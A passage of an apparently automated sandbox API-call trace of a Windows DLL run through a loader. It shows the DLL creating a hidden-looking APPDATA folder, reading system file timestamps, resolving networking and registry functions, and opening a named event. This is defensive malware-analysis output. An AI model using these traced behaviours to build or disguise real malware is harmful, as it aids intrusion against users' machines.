() returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.639] SetLastError (dwErrCode=0x0) [0033.639] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.640] SetLastError (dwErrCode=0x0) [0033.640] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.641] SetLastError (dwErrCode=0x0) [0033.641] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.642] SetLastError (dwErrCode=0x0) [0033.642] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.643] SetLastError (dwErrCode=0x0) [0033.643] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.644] GetLastError () returned 0x0 [0033.644] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.645] SetLastError (dwErrCode=0x0) [0033.645] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.646] SetLastError (dwErrCode=0x0) [0033.646] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.647] GetLastError () returned 0x0 [0033.647] SetLastError (dwErrCode=0x0) [0033.648] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.648] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.648] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f928 | out: lpSystemTimeAsFileTime=0x24f928*(dwLowDateTime=0xe1befe50, dwHighDateTime=0x1d3dfba)) [0033.659] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f860, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.659] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f748, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.659] GetLastError () returned 0x0 [0033.660] GetLastError () returned 0x0 [0033.660] GetLastError () returned 0x0 [0033.660] GetLastError () returned 0x0 [0033.660] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.660] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.660] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.660] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.660] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.660] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.660] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.660] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.660] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.660] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.660] GetLastError () returned 0xb7 [0033.660] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.660] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.660] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.660] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.660] wsprintfA (in: param_1=0x24f5c8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.660] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.660] wsprintfA (in: param_1=0x24f4c4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.660] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.661] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.661] CloseHandle (hObject=0x74) returned 1 [0033.661] GetLastError () returned 0x0 [0033.661] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.661] GetLastError () returned 0x0 [0033.661] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.661] GetSystemDirectoryA (in: lpBuffer=0x24f5c8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.661] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.661] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.661] CloseHandle (hObject=0x74) returned 1 [0033.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.661] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.661] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.662] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.663] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.663] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.663] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.663] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.663] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.663] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.663] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.664] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.665] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.665] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.665] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.665] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.665] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.665] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.665] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.665] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.665] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.666] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.666] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.666] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.666] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.666] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.666] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.666] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.666] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.667] HeapDestroy (hHeap=0x7d0000) returned 1 Process: id = "37" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb20" os_pid = "0xc28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1681 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1682 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1683 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1684 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1685 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1686 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1687 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1688 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1689 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1690 start_va = 0x7ffdf000 end_va = 